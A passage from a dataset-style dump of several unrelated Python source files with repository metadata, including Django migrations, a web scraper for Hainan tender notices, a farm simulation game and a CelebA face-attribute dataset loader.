('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('email', models.EmailField(max_length=254)),
('userImage', models.ImageField(default='media/default_image.jpeg', null=True, upload_to='')),
],
),
migrations.RemoveField(
model_name='folder',
name='author',
),
migrations.AddField(
model_name='folder',
name='owner',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='folders', to='FolderingFolderServer.User'),
),
]
| [
"wldnjszz1@naver.com"
] | wldnjszz1@naver.com |
14ecb79893f2a150fcc1e6200c9e85886e0f7225 | e282226e8fda085f4c64c044327eceb3388e94ce | /mainapp/api/urls.py | 1b3871642a15056f10650c9fb8bffcec8a5d906f | [] | no_license | Pavlenkovv/REST-API | 2bf36f40104a51f2735ce3dd3eebcf274061a1a2 | 352d0bd24e88fdb793e658c5b6eaffa97b56062c | refs/heads/main | 2023-03-15T22:45:50.121953 | 2021-03-07T07:56:31 | 2021-03-07T07:56:31 | 344,887,432 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py | from django.urls import path, include
from rest_framework.routers import DefaultRouter
from .api_views import AuthorViewSet, NewsPostViewSet, CommentViewSet
router = DefaultRouter()
router.register(r"newsposts", NewsPostViewSet, basename="user")
router.register(r"author", AuthorViewSet)
router.register(r"comment", CommentViewSet)
urlpatterns = [path("api/", include(router.urls))]
urlpatterns += router.urls
| [
"pavlenko.vyacheslav@gmail.com"
] | pavlenko.vyacheslav@gmail.com |
a577db8343aacf6c938785370776165124e21ff3 | fc536757e799e4e63a618f54be00c814bf0f6c8d | /clip-search/pipeline/src/source.py | b4e8c1e81743e00d23dba502f2389927e8c9fcb0 | [
"MIT"
] | permissive | wellcomecollection/data-science | 94384593827bbeca3e6a6fb6cdd92a1f256ad256 | f5d158de6d4d652e7264093c64420288ecb6a85b | refs/heads/main | 2023-08-28T11:46:36.724074 | 2023-08-21T15:12:59 | 2023-08-21T15:12:59 | 217,507,441 | 7 | 1 | MIT | 2023-09-14T08:57:58 | 2019-10-25T10:11:57 | Jupyter Notebook | UTF-8 | Python | false | false | 1,132 | py | from .elasticsearch import get_catalogue_elastic_client
def yield_source_images(pipeline_date):
es = get_catalogue_elastic_client(pipeline_date)
index_name = f"images-indexed-{pipeline_date}"
pit = es.open_point_in_time(index=index_name, keep_alive="12h")
search_after = None
while True:
results = es.search(
body={
"size": 100,
"query": {"match_all": {}},
"_source": ["query.id", "display"],
"sort": [{"query.id": "asc"}],
"pit": {"id": pit["id"], "keep_alive": "1m"},
"search_after": search_after,
},
)
for hit in results["hits"]["hits"]:
yield hit["_source"]["display"]
if len(results["hits"]["hits"]) < 100:
break
search_after = [results["hits"]["hits"][-1]["_source"]["query"]["id"]]
es.close_point_in_time(id=pit["id"])
def count_source_images(pipeline_date):
es = get_catalogue_elastic_client(pipeline_date)
index_name = f"images-indexed-{pipeline_date}"
return es.count(index=index_name)["count"]
| [
"h.pim@wellcome.org"
] | h.pim@wellcome.org |
9d85ca9a49ac29137fab87fa3e5409a1f53439cf | a4cd26dc44067e0818e8e5e8bcab1598dac4cbc3 | /Thread_timer.py | 8d18fbe00d1dadb8b62183406c36ab59c8efff8d | [] | no_license | pacoSAM/CAM-GUI | c7f19d9094df94677021cd5440f68c94bfb32a32 | aba2baacc11446b5869f035148f27fd10937020f | refs/heads/master | 2021-01-20T20:48:08.361399 | 2016-08-23T11:32:59 | 2016-08-23T11:32:59 | 65,860,237 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 739 | py | #! /usr/bin/python
#-*- coding: utf-8 -*-
#==========================================================
#Titre: timer
#
#
#Par: Paco SAMBA
#===========================================================
import threading ,time, datetime
verrou=threading.Lock()
class TimerDevice(threading.Thread):
def __init__(self,func, *args, **kwargs):
threading.Thread.__init__(self)
self.func=func
self.args=args
self.kwargs=kwargs
self.runable=True
def run(self):
while self.runable:
verrou.acquire()
self.func(*self.args, **self.kwargs)
verrou.release()
def stop(self):
self.runable=False
| [
"sambapaco@yahoo.fr"
] | sambapaco@yahoo.fr |
dd8efbcb0f30507324168b341eb1ef5685be3c38 | 19333274c884ecbdd1c2d11884de3cd9527b30b8 | /zl_spider/hainan/danzhou.py | c4e530d1a6268eec25ff5f431927f34bb7558b41 | [] | no_license | Gzigithub/- | 876efcb9400c2c3675a75c4530d9dfee9953ba5f | ec789bb31c85b1439901818c25dfbe0905963a79 | refs/heads/master | 2022-11-24T06:42:14.892696 | 2018-12-21T11:48:07 | 2018-12-21T11:48:07 | 126,142,010 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,499 | py | import time
import pandas as pd
import re
from lxml import etree
from selenium import webdriver
from bs4 import BeautifulSoup
from lmf.dbv2 import db_write
from selenium.webdriver import ActionChains, DesiredCapabilities
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.common.exceptions import NoSuchElementException, StaleElementReferenceException
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from lmfscrap import web
# __conp=["postgres","since2015","192.168.3.171","hunan","changsha"]
# url="https://ggzy.changsha.gov.cn/spweb/CS/TradeCenter/tradeList.do?Deal_Type=Deal_Type2"
# driver=webdriver.Chrome()
# driver.minimize_window()
# driver.get(url)
from zhulong import gg_meta, gg_html
def f1(driver, num):
print(num)
locator = (By.XPATH, "//table[@class='newtable']/tbody/tr[1]/td/a")
val = WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator)).text
locator = (By.XPATH, "//div[@class='pagesite']/div")
str = WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator)).text
cnum = re.findall(r'(\d+)/', str)[0]
# print(cnum)
if num != int(cnum):
if num == 1:
driver.execute_script("location.href=encodeURI('index.jhtml');")
else:
driver.execute_script("location.href=encodeURI('index_{}.jhtml');".format(num))
locator = (By.XPATH, "//table[@class='newtable']/tbody/tr[1]/td/a[string()!='%s']" % val)
WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator))
page = driver.page_source
soup = BeautifulSoup(page, 'lxml')
table= soup.find("table", class_="newtable")
tbody = table.find("tbody")
trs = tbody.find_all("tr")
data = []
for tr in trs[:-1]:
a = tr.find("a")
try:
link = a["href"]
except:
continue
tds = tr.find_all("td")[2].text
td = re.findall(r"\[(.*)\]", tds)[0]
tmp = [a["title"].strip(), td.strip(), link.strip()]
data.append(tmp)
df = pd.DataFrame(data)
df['info'] = None
return df
def f2(driver):
# driver.set_page_load_timeout(30)
# driver.maximize_window()
# driver.execute_script("location.reload()")
# html = driver.page_source
# if html:
# pass
# else:
# driver.refresh()
locator = (By.XPATH, "//table[@class='newtable']/tbody/tr[1]/td/a")
WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator))
locator = (By.XPATH, "//div[@class='pagesite']/div")
str = WebDriverWait(driver, 10).until(EC.presence_of_element_located(locator)).text
num = re.findall(r'/(\d+)', str)[0]
driver.quit()
return int(num)
def f3(driver, url):
driver.get(url)
locator = (By.CLASS_NAME, "navBar")
WebDriverWait(driver, 10).until(EC.presence_of_all_elements_located(locator))
before = len(driver.page_source)
time.sleep(0.1)
after = len(driver.page_source)
i = 0
while before != after:
before = len(driver.page_source)
time.sleep(0.1)
after = len(driver.page_source)
i += 1
if i > 5: break
page = driver.page_source
soup = BeautifulSoup(page, 'lxml')
div = soup.find('div', class_="newsTex")
return div
data = [
["gcjs_zhaobiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGjxzbgs1/index.jhtml",
["name", "ggstart_time", "href", "info"], f1, f2],
["gcjs_zhongbiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGjxzbgs/index.jhtml",
["name", "ggstart_time", "href", "info"], f1, f2],
["zfcg_zhaobiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGZFZBGS/index.jhtml",
["name", "ggstart_time", "href", "info"], f1, f2],
["zfcg_zhongbiao_gg", "http://zw.hainan.gov.cn/ggzy/dzggzy/GGZFZBGS1/index.jhtml",
["name", "ggstart_time", "href", "info"], f1, f2],
]
def work(conp):
gg_meta(conp,data=data,diqu="海南省儋州市")
gg_html(conp,f=f3)
if __name__ == '__main__':
conp=["postgres","since2015","192.168.3.171","hainan","danzhou"]
work(conp=conp)
#
# driver=webdriver.Chrome()
# url="http://zw.hainan.gov.cn/ggzy/dzggzy/GGjxzbgs1/index.jhtml"
# driver.get(url)
# df = f2(driver)
# print(df)
# for i in range(1, 5):
# df=f1(driver, i)
# print(df)
| [
"123456.com"
] | 123456.com |
afd910c1dc1ff1f57ec13ad810946ddbdff546d7 | dc05171d98f1dc9f1193dbd7cfb145c17f54004e | /credittransfer/home/migrations/0004_auto_20200909_1755.py | 07fd301ca30d43bc2d2cd45bf0ba77029fef02ef | [] | no_license | adityanandan/credit_management-TSF | 363730746ecae6dd5e119a432ccacb1670631204 | dbb2a59ce6e8d21885c401fff88473b09233865d | refs/heads/master | 2022-12-19T13:31:41.366496 | 2020-09-17T15:14:01 | 2020-09-17T15:14:01 | 295,351,086 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 536 | py | # Generated by Django 3.0.8 on 2020-09-09 12:25
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0003_auto_20200909_1653'),
]
operations = [
migrations.AddField(
model_name='user',
name='previous_credit',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='user',
name='user_id',
field=models.IntegerField(default=0),
),
]
| [
"agrahari.aditya16@gmail.com"
] | agrahari.aditya16@gmail.com |
6737cae69cbfad8f35c500dd8658e24cb6486688 | 097e6f529e9481de69415e89c1e5d653be0413a7 | /Field_Class.py | 0b3373c85244232f87111992a5a39a4d7773c797 | [] | no_license | Prudhvi-19/Farm-Management-System | 3057ec98b91f0ee479d14a72171a2521ceaa0efa | c8fb4a41a3a087e611457647fde5ba47bcb4df43 | refs/heads/master | 2020-04-22T12:23:08.483581 | 2019-02-12T18:36:10 | 2019-02-12T18:36:10 | 170,369,694 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,126 | py | from Cow_Class import *
from Sheep_Class import *
from Potato_Class import *
from Wheat_Class import *
import random
class Field:
"""A Class to stimulate Field which Contain Plants and Animals ."""
#constructor
def __init__(self, max_animals, max_crops):
self._crops = []
self._animals = []
self._max_animals = max_animals
self._max_crops = max_crops
def plant_crop(self,crop):
if len(self._crops) < self._max_crops:
self._crops.append(crop)
return True
else:
return False
def add_animal(self,animal):
if len(self._animals) < self._max_animals:
self._animals.append(animal)
return True
else:
return False
def harvest_crop(self,position):
return self._crops.pop(position)
def remove_animal(self,position):
return self._animals.pop(position)
def report_contents(self):
crop_report = []
animal_report = []
for crop in self._crops:
crop_report.append(crop.report())
for animal in self._animals:
animal_report.append(animal.report())
return {'Crops' : crop_report , 'Animals': animal_report}
def report_need(self):
food = 0
light = 0
water = 0
for crop in self._crops:
needs = crop.needs()
if needs['light_need'] > light:
light = needs['light_need']
if needs['water_need'] > water:
water = needs['water_need']
for animal in self._animals:
needs = animal.needs()
food = food + needs['food need']
if needs['water need'] > water:
water = needs['water need']
return {'Food' : food, 'Light' : light, 'Water': water}
def grow(self,food,light,water):
#grow the crop (Light and Water available to all the crops in same amount)
if (len(self._crops)>0):
for crop in self._crops:
crop.grow(light,water)
#grow the animals (water available to all the animals in same amount)
#but food is total that must be shared
if (len(self._animals)>0):
#get total amount of food required in the Field
food_required = 0
for animal in self._animals:
needs = animal.needs()
food_required += needs['food need']
#if we have more food available than is required work out the additional_food
if food > food_required:
additional_food = food - food_required
food = food_required
else:
additional_food = 0
#Grow each animal
for animal in self._animals:
#get the animals food needs
needs = animal.needs()
if food >= needs['food need']:
#remove food for this animal from total
food = food - needs['food need']
feed = needs['food need']
#see if there is additional_food left
if additional_food > 0:
#remove food from additional_food for this animal
additional_food -= 1
#add this to the feed given to animal
feed += 1
animal.grow(feed,water)
def auto_grow(field,days):
for day in range(days):
light = random.randint(1,10)
water = random.randint(1,10)
food = random.randint(1,100)
#Grow the Field
field.grow(food,light,water)
def manual_grow(field):
#Get Food Value
valid = False
while not valid:
try:
food = int(input("Please enter food value(1-100): "))
if 1<=food<=100:
valid = True
else:
print ("Value entered not valid please enter value between 1-100")
except ValueError:
print ("Value entered not valid please enter value between 1-100")
#Get Water Value
valid = False
try:
water = int(input("Please enter water value(1-10): "))
if 1<=water<=10:
valid = True
else:
print ("Value entered not valid please enter value between 1-10")
except ValueError:
print ("Value entered not valid please enter value between 1-10")
#Get Light Value
valid = False
while not valid:
try:
light = int(input("Please enter light value(1-10): "))
if 1<=light<=10:
valid = True
else:
print ("Value entered not valid please enter value between 1-10")
except ValueError:
print ("Value entered not valid please enter value between 1-10")
field.grow(food,light,water)
def display_crops(crop_list):
print()
print("The following are the crops in field: ")
pos = 1
for crop in crop_list:
print("{0:>2}. {1}".format(pos,crop.report()))
pos += 1
def display_animals(animal_list):
print()
print("The following are thr animals in the field: ")
pos = 1
for animal in animal_list:
print("{0:>2}. {1}".format(pos,animal.report()))
pos += 1
def select_crop(length_list):
valid = False
while not valid:
selected = int(input("Please select a crop: "))
if selected in range(1,length_list+1):
valid = True
else:
print("Please select a valid option")
return selected - 1
def select_animal(length_list):
valid = False
while not valid:
selected = int(input("Please select a animal: "))
if selected in range(1,length_list+1):
valid = True
else:
print("Please select a valid option")
return selected - 1
def harvest_crop_from_field(field):
display_crops(field._crops)
selected_crop = select_crop(len(field._crops))
return field.harvest_crop(selected_crop)
def remove_animal_from_field(field):
display_animals(field._animals)
selected_animal = select_animal(len(field._animals))
return field.remove_animal(selected_animal)
def display_crop_menu():
print ()
print("Which crop do you like to plant?: ")
print("1. Potato")
print("2. Wheat")
print()
print("0. I dont want to plant crop return me to main menu")
print()
print("Please select an action from Above menu")
def display_animal_menu():
print ()
print("Which animal do you like to buy?: ")
print("1. Cow")
print("2. Sheep")
print()
print("0. I dont want to buy animal return me to main menu")
print()
print("Please select an action from Above menu")
def display_main_menu():
print()
print("1. Plant a new crop")
print("2. Harvest a crop")
print()
print("3. Buy a new animal")
print("4.Slaughter a animal")
print()
print("5. Grow field manually over 1 day")
print("6. Grow Field automatically over 30 days")
print()
print("7. Report Field Status")
print()
print("0. Exit Field")
print()
print("Please select an action from Above menu")
def get_menu_choice(lower,upper):
valid = False
while not valid:
try:
choice = int(input("Option selected: "))
if lower <= choice <= upper:
valid = True
else:
print("Please select a valid option "+lower +"-"+upper)
except ValueError:
print("Please select a valid option "+lower +"-"+upper)
return choice
def plant_crop_in_field(field):
display_crop_menu()
choice = get_menu_choice(0,2)
if choice == 1:
if field.plant_crop(Potato()):
print()
print ("Potato planted")
print()
else:
print()
print("No space in your field to plant potato")
print()
if choice == 2:
if field.plant_crop(Wheat()):
print()
print ("Wheat planted")
print()
else:
print()
print("No space in your field to plant wheat")
print()
def add_animal_to_field(field):
display_animal_menu()
choice = get_menu_choice(0,2)
if choice == 1:
print()
name=input(("What is the name of the cow: "))
print()
if field.add_animal(Cow(name)):
print()
print ("Cow added to herd")
print()
else:
print()
print("No space in your field to add cow")
print()
if choice == 2:
print()
name=input(("What is the name of the sheep: "))
print()
if field.add_animal(Sheep(name)):
print()
print ("Sheep added to herd")
print()
else:
print()
print("No space in your field to add sheep")
print()
def manage_field(field):
print ("Welcome to your field management Program")
print()
exit = False
while not exit:
display_main_menu()
option = get_menu_choice(0,7)
print()
if option == 1:
plant_crop_in_field(field)
elif option == 2:
removed_crop = harvest_crop_from_field(field)
print("You harvested the crop: {0}".format(removed_crop))
elif option == 3:
add_animal_to_field(field)
elif option == 4:
removed_animal = remove_animal_from_field(field)
print("You butchered the animal: {0}".format(removed_animal))
elif option == 5:
manual_grow(field)
elif option == 6:
auto_grow(field,30)
elif option == 7:
print(field.report_contents())
elif option == 0:
exit = True
print()
print ("Bye Bye ! See you again thanks for using field management program")
#Main Function of Field Class
def main():
new_field = Field(5,2)
manage_field(new_field)
if __name__ == '__main__':
main()
| [
"noreply@github.com"
] | noreply@github.com |
daaaf0b5b3f4c3a36f1009e3b2b8a1cb64e00908 | af72519425d8a57afa86776a5a415aadaba8a1a0 | /clairvoyance/entity_types.py | 2c8670b4f66f4de2d82403d4541b1b30a897ae19 | [] | no_license | paulbricman/python-clairvoyance | 95d3daf47648973c9dea818137204affa9fdcd52 | 5c06dcd98107c1d37baf8157f029c0bbd35efe81 | refs/heads/master | 2021-09-13T10:45:49.126306 | 2018-04-28T15:40:58 | 2018-04-28T15:40:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | def string_type():
return ['string', '']
def lang_type():
return ['string', 'lang']
def name_type():
return ['string', 'name']
def domain_type():
return ['string', 'domain']
def ip_type():
return ['string', 'ip']
def country_type():
return ['string', 'country']
def integer_type():
return ['integer', '']
def float_type():
return ['float', '']
| [
"paubric@gmail.com"
] | paubric@gmail.com |
1b41395082d1617e92cb4539c977d7f616a594fc | ecd630f54fefa0a8a4937ac5c6724f9a3bb215c3 | /projeto/avalista/migrations/0022_auto_20200910_1230.py | 8922215b9bc4a928404f7c8043839ce3aebed4a8 | [] | no_license | israelwerther/Esctop_Israel_Estoque | 49968751464a38c473298ed876da7641efedf8de | d6ab3e502f2a97a0d3036351e59c2faa267c0efd | refs/heads/master | 2023-01-07T20:21:38.381593 | 2020-11-12T17:35:14 | 2020-11-12T17:35:14 | 258,642,721 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 667 | py | # Generated by Django 3.0.7 on 2020-09-10 12:30
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('avalista', '0021_avalista_fiador_n_operacao'),
]
operations = [
migrations.AlterField(
model_name='avalista',
name='fiador_agencia',
field=models.CharField(blank=True, max_length=15, null=True, verbose_name='Nº agência'),
),
migrations.AlterField(
model_name='avalista',
name='fiador_conta',
field=models.CharField(blank=True, max_length=15, null=True, verbose_name='Nº conta'),
),
]
| [
"israelwerther48@outlook.com"
] | israelwerther48@outlook.com |
0e228e608ad73772836b6b7c8696378c9b1eb319 | b444914008df603953c8c53d0eb833cf6e7f8dce | /deal_with_news/deal_with_news.py | bde6b832a0595aa5e9425d3c9844beb50ec6d708 | [] | no_license | changgedangxiao/craller_news | cceab2bf698c0f4658b49319b44288d574505e09 | dd1801b93eb7c38b0818921b94c3528761a60845 | refs/heads/master | 2022-12-17T07:27:06.154422 | 2019-01-29T11:14:23 | 2019-01-29T11:14:23 | 168,132,484 | 0 | 0 | null | 2022-12-08T01:34:19 | 2019-01-29T10:02:05 | HTML | UTF-8 | Python | false | false | 825 | py | #coding=utf-8
from bs4 import BeautifulSoup
import re
from craller_news.mysql_jh import DBConn
def deal_html(html_path="../fetch_html/1.html"):
soup=BeautifulSoup(open(html_path))
news_title=soup.title.string
news_author=soup.find(name="p",attrs={"class":"author-name"}).string
news_source=soup.find()
news_list=soup.find_all(name="span",attrs={"class":["bjh-p","source"]})
news_str=""
for i in news_list:
str=unicode(i.string).encode("utf-8")
news_str+=str
#去除内容为None的段落
news_content=re.sub(r"None","",news_str)
return news_title,news_author,news_content
for i in deal_html():
print i
db_host = "127.0.0.1"
db_user = "root"
db_passwd = "Tianhu201"
db_name = "news"
db_conn = DBConn(db_host, db_user, db_passwd, db_name)
db_conn.insert_data()
| [
"hongli@starmerx.com"
] | hongli@starmerx.com |
13ca1c0d5bb3a665f885467aeb92cf786bba64b1 | c7e2e34b900029872b6760a38e905e9ebbdc31b6 | /lib/datasets/celeba.py | 4ed48778297b93519fdbad609949c052982a1e11 | [
"MIT",
"LicenseRef-scancode-generic-cla",
"BSD-2-Clause"
] | permissive | JiajianZeng/caffe-face-attributes | 333e56c3f43b64b600065aa6e5deb8e1a5c56ccb | c5c16d1eadea85fa40156de414fdbe595293aac2 | refs/heads/master | 2021-01-17T21:09:10.636678 | 2018-03-28T16:54:11 | 2018-03-28T16:54:11 | 84,162,833 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,243 | py | # --------------------------------------------------------
# Fast R-CNN
# Copyright (c) 2015 Microsoft
# Licensed under The MIT License [see LICENSE for details]
# Written by Ross Girshick
# --------------------------------------------------------
import os
from datasets.imdb import imdb
import datasets.ds_utils as ds_utils
import xml.etree.ElementTree as ET
import numpy as np
import scipy.sparse
import scipy.io as sio
import utils.cython_bbox
import cPickle
import subprocess
import uuid
from celeba_eval import voc_eval, roc_curve_single_attribute, dataset_eval
from fast_rcnn.config import cfg
class celeba(imdb):
def __init__(self, image_set, devkit_path=None):
imdb.__init__(self, 'celeba_' + image_set)
self._image_set = image_set
self._devkit_path = self._get_default_path() if devkit_path is None \
else devkit_path
self._data_path = os.path.join(self._devkit_path, 'CelebA')
self._classes = ('__background__', # always index 0
'eye', 'nose', 'mouth', 'upper', 'lower', 'face')
self._face_attributes_name = ('5_o_Clock_Shadow', 'Arched_Eyebrows', 'Attractive' ,'Bags_Under_Eyes',
'Bald', 'Bangs', 'Big_Lips', 'Big_Nose',
'Black_Hair', 'Blond_Hair', 'Blurry', 'Brown_Hair',
'Bushy_Eyebrows', 'Chubby', 'Double_Chin', 'Eyeglasses',
'Goatee', 'Gray_Hair', 'Heavy_Makeup', 'High_Cheekbones',
'Male', 'Mouth_Slightly_Open', 'Mustache', 'Narrow_Eyes',
'No_Beard', 'Oval_Face', 'Pale_Skin', 'Pointy_Nose',
'Receding_Hairline', 'Rosy_Cheeks', 'Sideburns', 'Smiling',
'Straight_Hair', 'Wavy_Hair', 'Wearing_Earrings', 'Wearing_Hat',
'Wearing_Lipstick', 'Wearing_Necklace', 'Wearing_Necktie', 'Young' )
self._class_to_ind = dict(zip(self.classes, xrange(self.num_classes)))
self._image_ext = '.jpg'
self._image_index = self._load_image_set_index()
# Default to roidb handler
self._roidb_handler = self.selective_search_roidb
self._salt = str(uuid.uuid4())
self._comp_id = 'comp4'
# PASCAL specific config options
# min_size here means the minimum size of the boxes to keep
# cleanup means whether to clean up the voc results file or not
self.config = {'cleanup' : False,
'use_salt' : True,
'use_diff' : False,
'matlab_eval' : False,
'rpn_file' : None,
'min_size' : 2}
assert os.path.exists(self._devkit_path), \
'CelebAdevkit path does not exist: {}'.format(self._devkit_path)
assert os.path.exists(self._data_path), \
'Path does not exist: {}'.format(self._data_path)
def image_path_at(self, i):
"""
Return the absolute path to image i in the image sequence.
"""
return self.image_path_from_index(self._image_index[i])
def face_attributes_name(self):
return self._face_attributes_name
def image_path_from_index(self, index):
"""
Construct an image path from the image's "index" identifier.
"""
image_path = os.path.join(self._data_path, 'JPEGImages',
index + self._image_ext)
assert os.path.exists(image_path), \
'Path does not exist: {}'.format(image_path)
return image_path
def _load_image_set_index(self):
"""
Load the indexes listed in this dataset's image set file.
"""
# Example path to image set file:
# self._devkit_path + /CelebAdevkit/CelebA/ImageSets/Main/val.txt
image_set_file = os.path.join(self._data_path, 'ImageSets', 'Main',
self._image_set + '.txt')
assert os.path.exists(image_set_file), \
'Path does not exist: {}'.format(image_set_file)
with open(image_set_file) as f:
image_index = [x.strip() for x in f.readlines()]
return image_index
def _get_default_path(self):
"""
Return the default path where PASCAL VOC is expected to be installed.
"""
return os.path.join(cfg.DATA_DIR, 'CelebAdevkit')
def gt_roidb(self):
"""
Return the database of ground-truth regions of interest.
This function loads/saves from/to a cache file to speed up future calls.
"""
cache_file = os.path.join(self.cache_path, self.name + '_gt_roidb.pkl')
if os.path.exists(cache_file):
with open(cache_file, 'rb') as fid:
roidb = cPickle.load(fid)
print '{} gt roidb loaded from {}'.format(self.name, cache_file)
return roidb
gt_roidb = [self.load_celeba_annotation(index)
for index in self.image_index]
with open(cache_file, 'wb') as fid:
cPickle.dump(gt_roidb, fid, cPickle.HIGHEST_PROTOCOL)
print 'wrote gt roidb to {}'.format(cache_file)
return gt_roidb
def selective_search_roidb(self):
"""
Return the database of selective search regions of interest.
Ground-truth ROIs are also included.
This function loads/saves from/to a cache file to speed up future calls.
"""
cache_file = os.path.join(self.cache_path,
self.name + '_selective_search_roidb.pkl')
if os.path.exists(cache_file):
with open(cache_file, 'rb') as fid:
roidb = cPickle.load(fid)
print '{} ss roidb loaded from {}'.format(self.name, cache_file)
return roidb
if self._image_set != 'test':
gt_roidb = self.gt_roidb()
ss_roidb = self._load_selective_search_roidb(gt_roidb)
roidb = imdb.merge_roidbs(gt_roidb, ss_roidb)
else:
roidb = self._load_selective_search_roidb(None)
with open(cache_file, 'wb') as fid:
cPickle.dump(roidb, fid, cPickle.HIGHEST_PROTOCOL)
print 'wrote ss roidb to {}'.format(cache_file)
return roidb
def rpn_roidb(self):
if self._image_set != 'test':
gt_roidb = self.gt_roidb()
rpn_roidb = self._load_rpn_roidb(gt_roidb)
roidb = imdb.merge_roidbs(gt_roidb, rpn_roidb)
else:
roidb = self._load_rpn_roidb(None)
return roidb
def _load_rpn_roidb(self, gt_roidb):
filename = self.config['rpn_file']
print 'loading {}'.format(filename)
assert os.path.exists(filename), \
'rpn data not found at: {}'.format(filename)
with open(filename, 'rb') as f:
box_list = cPickle.load(f)
return self.create_roidb_from_box_list(box_list, gt_roidb)
def _load_selective_search_roidb(self, gt_roidb):
filename = os.path.abspath(os.path.join(cfg.DATA_DIR,
'selective_search_data',
self.name + '.mat'))
assert os.path.exists(filename), \
'Selective search data not found at: {}'.format(filename)
raw_data = sio.loadmat(filename)['boxes'].ravel()
box_list = []
for i in xrange(raw_data.shape[0]):
boxes = raw_data[i][:, (1, 0, 3, 2)] - 1
keep = ds_utils.unique_boxes(boxes)
boxes = boxes[keep, :]
keep = ds_utils.filter_small_boxes(boxes, self.config['min_size'])
boxes = boxes[keep, :]
box_list.append(boxes)
return self.create_roidb_from_box_list(box_list, gt_roidb)
def load_celeba_annotation(self, index):
"""
Load image and bounding boxes info and face attributes info from XML file in the PASCAL VOC
format.
"""
filename = os.path.join(self._data_path, 'Annotations', index + '.xml')
tree = ET.parse(filename)
# load the face attributes info
attributes = tree.findall('attribute')
num_attributes = len(attributes)
face_attrs = np.zeros((num_attributes), dtype=np.int32);
for ix, attribute in enumerate(attributes):
face_attrs[ix] = int(attribute.find('value').text)
# load the boxes info
objs = tree.findall('object')
if not self.config['use_diff']:
# Exclude the samples labeled as difficult
non_diff_objs = [
obj for obj in objs if int(obj.find('difficult').text) == 0]
# if len(non_diff_objs) != len(objs):
# print 'Removed {} difficult objects'.format(
# len(objs) - len(non_diff_objs))
objs = non_diff_objs
num_objs = len(objs)
boxes = np.zeros((num_objs, 4), dtype=np.uint16)
gt_classes = np.zeros((num_objs), dtype=np.int32)
overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)
# "Seg" area for pascal is just the box area
seg_areas = np.zeros((num_objs), dtype=np.float32)
# Load object bounding boxes into a data frame.
for ix, obj in enumerate(objs):
bbox = obj.find('bndbox')
# Make pixel indexes 0-based
x1 = float(bbox.find('xmin').text) - 1
y1 = float(bbox.find('ymin').text) - 1
x2 = float(bbox.find('xmax').text) - 1
y2 = float(bbox.find('ymax').text) - 1
cls = self._class_to_ind[obj.find('name').text.lower().strip()]
boxes[ix, :] = [x1, y1, x2, y2]
gt_classes[ix] = cls
overlaps[ix, cls] = 1.0
seg_areas[ix] = (x2 - x1 + 1) * (y2 - y1 + 1)
overlaps = scipy.sparse.csr_matrix(overlaps)
return {'boxes' : boxes,
'gt_classes': gt_classes,
'gt_overlaps' : overlaps,
'flipped' : False,
'seg_areas' : seg_areas,
'face_attrs': face_attrs}
def _get_comp_id(self):
comp_id = (self._comp_id + '_' + self._salt if self.config['use_salt']
else self._comp_id)
return comp_id
def _get_celeba_results_file_template(self):
# CelebAdevkit/results/CelebA/Main/<comp_id>_det_test_aeroplane.txt
filename = self._get_comp_id() + '_attr_' + self._image_set + '_{:s}.txt'
path = os.path.join(
self._devkit_path,
'results',
'CelebA',
'Main',
filename)
return path
def _write_celeba_results_file(self, all_probs):
for attr_ind, attr in enumerate(self._face_attributes_name):
print 'Writing {} CelabA results file'.format(attr)
filename = self._get_celeba_results_file_template().format(attr)
with open(filename, 'wt') as f:
for im_ind, index in enumerate(self.image_index):
attr_prob = all_probs[im_ind]
f.write('{:s} {:.3f} {:.3f}\n'.
format(index, attr_prob[attr_ind, 0],
attr_prob[attr_ind, 1]))
def _do_python_eval(self, output_dir = 'output'):
annopath = os.path.join(
self._devkit_path,
'CelebA',
'Annotations',
'{:s}.xml')
imagesetfile = os.path.join(
self._devkit_path,
'CelebA',
'ImageSets',
'Main',
self._image_set + '.txt')
cachedir = os.path.join(self._devkit_path, 'annotations_cache')
aps = []
# The PASCAL VOC metric changed in 2010
# use_07_metric = True if int(self._year) < 2010 else False
use_07_metric = True
print 'VOC07 metric? ' + ('Yes' if use_07_metric else 'No')
if not os.path.isdir(output_dir):
os.mkdir(output_dir)
for i, attr in enumerate(self._face_attributes_name):
filename = self._get_celeba_results_file_template().format(attr)
rec, prec, acc = voc_eval(
filename, annopath, imagesetfile, attr, cachedir, ovthresh=0.5,
use_07_metric=use_07_metric)
ap = roc_curve_single_attribute(filename, annopath, imagesetfile, attr, cachedir)
aps += [ap]
print('recall for {} = {:.4f}'.format(attr, rec))
print('precision for {} = {:.4f}'.format(attr, prec))
print('accuracy for {} = {:.4f}'.format(attr, acc))
print('average precision for {} = {:.4f}'.format(attr, ap))
with open(os.path.join(output_dir, attr + '_pr.pkl'), 'w') as f:
cPickle.dump({'rec': rec, 'prec': prec}, f)
print('Mean AP = {:.4f}'.format(np.mean(aps)))
print('~~~~~~~~')
print('Results:')
for ap in aps:
print('{:.3f}'.format(ap))
print('{:.3f}'.format(np.mean(aps)))
print('~~~~~~~~')
print('')
print('--------------------------------------------------------------')
print('Results computed with the **unofficial** Python eval code.')
print('Results should be very close to the official MATLAB eval code.')
